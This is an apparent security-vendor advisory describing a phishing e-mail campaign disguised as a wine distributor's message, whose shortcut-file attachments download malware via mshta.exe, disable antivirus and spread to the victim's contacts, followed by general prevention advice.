INCA Internet response team detected malicious e-mail disguised as sent from one of premium wine and spirits distributors. This malicious e-mail has real name and mail address on sender field of Denmark branch. The main feature is that it uses link file for its infection. Besides, once infected, it forcibly stops on certain Anti-Virus programs and shows main screen of certain messenger including MSN. Those files were written in Spanish and it hasn't been found in Korea so far.
With booming of being spread these kinds of malicious files, users need to be careful on using internet and be safe from malicious e-mails.
2. Spreading cases and symptom of infection
This malicious file is disguised as sent from wine company and induces user to download malicious file. Once infected, it collects victim's mail contacts and tries to spread same mail to collected address.
It shows that sender's address is from Denmark branch. Users can be easily dazzled. Following image is real "Jacob Hertz".
Malicious functions are as following.
We can find 2 Ink files after extracting.
These icons are being looked like as help file and messenger. On running, both can download additional malicious file with using "mshta.exe", application related executable file. Following figure shows commands.
On executing additional malicious file(msnmsgr.tpl) by certain command, it will download various script file and malicious files.
Downloaded malicious script files download other malicious files to be shown as a MSN messenger(Spainish version).
Besides, it changes start page, deactivates task manager, activates remote desktop and sets shell script command.
With using certain command, it kills Anti-Virus(Avira) and browsers. It tries to access on certain external server and can download additional malicious file and be worked as a bot by certain command from remote server.
It changes all folders property to hidden and creates link files on being infected.
These new link files looked same as previous folders. Users can click these files.
Following malicious behavior also can be worked.
3. How to prevent
Spreading malicious file with e-mail is very traditional. But a lot of users are still trying to open its attachment and being infected. To use PC safely from security threats of these malicious attachments, we recommend you download latest security updates and obey following "Security management tips" for general users.
INCA Internet (Security Response Center / Emergency Response Team) runs responding system against various security threats.